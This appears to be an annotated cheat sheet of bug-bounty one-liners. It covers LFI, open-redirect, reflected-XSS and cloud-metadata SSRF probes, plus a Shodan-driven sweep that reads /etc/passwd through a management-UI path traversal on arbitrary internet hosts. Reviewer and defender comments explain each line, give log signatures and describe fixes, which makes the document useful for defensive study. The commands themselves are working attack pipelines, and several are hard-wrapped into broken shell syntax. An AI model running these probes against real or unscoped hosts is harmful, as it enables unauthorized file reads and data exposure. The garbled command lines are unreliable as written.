# Local file inclusion (LFI) check.
# gau lists known URLs for the domain, gf keeps the ones matching its lfi
# pattern set, and qsreplace sets every query-string value to /etc/passwd.
# xargs then fetches each rewritten URL with up to 25 parallel curl workers
# and prints the URL when the response contains the string root:x.
# NOTE(review): the listing is hard-wrapped; domain. and tld on the next line
# are one token (domain.tld).
# Defender view: a hit means a request parameter reaches a file-read call
# without validation. Map the parameter to an allow-list of files instead of
# accepting a path. In access logs this run appears as a burst of requests
# whose parameter values are all /etc/passwd (possibly URL-encoded).
LFI : gau domain.
tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c
'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
# Open redirect check.
# LHOST is a marker origin. It is exported because the single-quoted sh -c
# body expands $LHOST in the child shell, not in the calling shell.
# $1 is the domain passed to gau, so the line is written as the body of a
# script or function. gf redirect keeps URLs with redirect-style parameters,
# qsreplace sets every query value to the marker, and curl -I requests
# headers only. A URL is reported when a Location header carries the marker.
# NOTE(review): the grep is case-sensitive on the header name and curl is not
# following redirects, so an empty result is not evidence that a parameter
# is safe.
# Defender view: accept only relative paths or hosts from an allow-list as
# redirect targets. Requests with http://localhost in many different
# parameters are the log signature of this probe.
Open Redirect : export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace
"$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST"
&& echo "VULN! %"'
# Reflected XSS sweep.
# gospider crawls the sites listed in targets_urls.txt (-c 10 concurrent
# requests, -d 5 crawl depth), skips static assets through the --blacklist
# regex and also pulls URLs from third-party sources (--other-source).
# The pipeline keeps lines tagged code-200, takes the fifth field (the URL in
# gospider output - confirm against the installed version), keeps URLs that
# have a query string, and hands them through qsreplace -a to dalfox, which
# reads URLs from stdin in pipe mode. tee stores the findings in result.txt.
# NOTE(review): the leading dot in the blacklist regex is unescaped, so it
# matches any character, not only a literal dot before the extension.
# Defender view: treat dalfox output as candidates to confirm manually. The
# fix is context-aware output encoding on the reflected parameter, with a
# Content-Security-Policy as a second layer.
XSS : gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|
tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk
'{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
# Cloud metadata SSRF check.
# URLs from blindssrftesturl.txt are de-duplicated, filtered to live hosts by
# httpx, and every query value is replaced with the link-local instance
# metadata URL 169.254.169.254/latest/meta-data/hostname. Each result is
# fetched with curl -k (TLS certificate verification disabled) and reported
# when the response contains compute.internal, the suffix of an internal
# EC2 hostname.
# NOTE(review): the quotes around % on the curl line are typographic quotes
# left by page formatting, not shell quotes, and curl - / ks is a wrapped
# curl -ks.
# Defender view: this probe is a plain GET to the metadata service. Requiring
# IMDSv2 session tokens on instances and blocking egress from application
# servers to 169.254.169.254 both stop it. Fetchers that take a URL parameter
# should resolve and validate the destination against an allow-list.
Cloud SSRF: cat blindssrftesturl.txt | sort -u | anew | httpx | qsreplace
'http://169.254.169.254/latest/meta-data/hostname' | xargs -I % -P 25 sh -c 'curl -
ks “%” 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"'
# Exposure sweep for a management-UI file-read path.
# The Shodan query selects hosts by favicon hash plus the string 3992 and
# prints ip_str and port; awk joins them as host:port. For each entry curl
# requests the tmui fileRead.jsp path with --path-as-is, so the ..;/ segment
# is sent unnormalized, and with --insecure, so certificates are not checked.
# The host is labelled Vulnerable when the response contains the word root.
# NOTE(review): presumably this targets the F5 BIG-IP TMUI interface -
# confirm; the page names neither the product nor an advisory.
# NOTE(review): input is whatever Shodan returns for the hash, not a scoped
# asset list, and grep -q root matches any page containing that word, so the
# Vulnerable label needs manual confirmation.
# Defender view: the log signature is a request path containing
# /tmui/login.jsp/..;/ followed by fileRead.jsp. Keep the management
# interface off internet-facing addresses and apply the vendor fix for the
# path handling.
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator
" " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --
insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?
fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" ||
printf "$host \033[0;32mNot Vulnerable\n";done